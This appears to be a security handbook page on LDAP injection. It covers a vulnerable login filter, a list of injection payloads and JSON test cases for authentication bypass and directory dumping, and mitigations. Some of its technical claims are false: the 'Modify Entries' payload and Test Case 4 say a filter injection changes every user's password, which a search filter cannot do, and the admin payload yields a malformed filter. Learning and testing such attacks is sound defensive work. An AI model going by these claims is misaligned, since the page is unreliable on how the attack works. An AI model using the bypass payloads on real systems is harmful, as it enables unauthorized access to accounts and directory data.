LDAP Injection

Description

LDAP Injection is a type of attack that exploits web applications to execute arbitrary LDAP (Lightweight Directory Access Protocol) queries. By injecting malicious LDAP statements into an application, attackers can bypass authentication, retrieve sensitive information, or modify LDAP entries.

Example with Scenario

Consider a web application that allows users to log in using their username and password. The application constructs an LDAP query to authenticate the user. If the input is not properly sanitized, an attacker can inject malicious LDAP queries.

Scenario: A login form where a user inputs a username and password:

  • Input fields: username, password

  • LDAP query: (&(uid={username})(userPassword={password}))

Payloads and Test Cases

Payloads

  1. Basic LDAP Injection:

    • username: *

    • password: *

    • This payload attempts to bypass authentication by injecting wildcards.

  2. Bypass Authentication:

    • username: admin)(|(password=*))

    • password: anything

    • This payload attempts to authenticate as the admin user by injecting an OR condition.

  3. Extract Information:

    • username: *

    • password: *

    • This payload retrieves all user records by injecting a wildcard.

  4. Modify Entries:

    • username: *)(|(userPassword=anynewpassword))

    • password: anypassword

    • This payload attempts to modify the password for all users.

Test Cases

  1. Test Case 1: Bypass with Wildcards

    • Input:

      {
  "username": "*",
  "password": "*"
}

    • Expected Result: Successful login without valid credentials.

  2. Test Case 2: OR Condition Injection

    • Input:

      {
  "username": "admin)(|(password=*))",
  "password": "anypassword"
}

    • Expected Result: Login as admin user without knowing the actual password.

  3. Test Case 3: Extract All Entries

    • Input:

      {
  "username": "*",
  "password": "*"
}

    • Expected Result: Retrieve all user entries from the LDAP directory.

  4. Test Case 4: Modify User Passwords

    • Input:

      {
  "username": "admin)(|(userPassword=anynewpassword))",
  "password": "anypassword"
}

    • Expected Result: Passwords for all users are changed to anynewpassword.

Mitigation

  1. Input Validation and Sanitization:

    • Validate and sanitize user inputs by using allowlists to ensure only valid characters are accepted.

    • Reject any inputs containing LDAP-specific metacharacters.

  2. Parameterized Queries:

    • Use parameterized LDAP queries or prepared statements to prevent injection.

  3. Escape User Inputs:

    • Properly escape all user inputs before including them in LDAP queries.

  4. Least Privilege Principle:

    • Ensure the LDAP account used by the application has the minimum necessary privileges to perform its functions.

  5. Security Testing:

    • Regularly perform security testing, including automated scans and manual penetration tests, to identify and fix potential LDAP injection vulnerabilities.

  6. Logging and Monitoring:

    • Implement logging and monitoring mechanisms to detect and respond to suspicious activities related to LDAP queries.

PreviousInsecure DeserializationNextXPath Injection

Last updated